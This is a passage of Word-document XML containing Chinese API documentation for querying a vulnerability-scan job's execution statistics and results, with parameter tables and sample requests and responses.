          <w:p w14:paraId="0B6B21A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F6439B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27816078" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D39D685" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EE79EA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06BE7411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53776C44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7788C550" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295EA76C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>defaultValue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F49AD2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38859A79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7883E8D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55069143" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="作业执行基本信息查询"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r>
        <w:t>作业执行基本信息查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF9346" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C1DFC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B21515"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974"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="259C652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4DF86EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E47B95F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709F2D5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A480F9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE04321" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="657C4644" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA09384" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69525869" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098BB9CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5063B70D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C7255CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必传，作业类型：1：全局作业 2：用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1716A42A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4A7F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/stats</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5b8dfe107d761b471404112d","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CB835E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B9D8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "jobId": "5b8dfe107d761b471404112d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "jobName": "testt",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "createTime": "2018-09-04 11:37:52",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "executeJobId": "5b9b327c1522e85a802faa34",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "executeStatus": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "lastExecuteTime": "2018-09-14 12:01:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "duration": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "vulCount": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostCount": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "taskCount": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "successHostCount": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "failedHostCount": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457A2A8"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926"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="7379"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="070C6F9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107D39D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="244DD394" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58BA8851" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59BB438E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0320F1A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E2932B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C349EC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="313B6C86" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001B7894" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38ED7F03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2E673E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="109B921E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FBF1098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FEC6EBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C610221" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05AED54C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B41527B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeJobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5405FA65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0463DA00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="66FC0598" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3966EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782E7347" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29095B30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行状态; 0：未开始执行，1：排队执行，2：正在执行，3：执行成功，4：执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11B301C5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D6F8B28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3A6FCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BDFBF19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F518D27" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B579452" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E1D8A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3840F707" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行耗时秒数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29845814" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A0E130" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44EBEE57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A235BC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>漏洞数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57A395A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5533C3FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF2C11D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E74735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65807413" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39B0A92B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4956A260" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA008DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测项数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16BB06BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF1F7CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>failedHostCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CBBAFA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="274ED7D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="110C503C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFE138B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>successHostCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71408CA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546064EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>成功主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="206EBE81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="作业执行漏洞结果查询"/>
      <w:bookmarkEnd w:id="126"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>作业执行漏洞结果查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538F10E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3287ACE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/result_detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A001A78"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974"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3066A3F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1042232" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A09F45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0B025E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="566973AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CAE2AED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B1B643" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CAA2565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F49BF30" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2687818D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3781BF90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
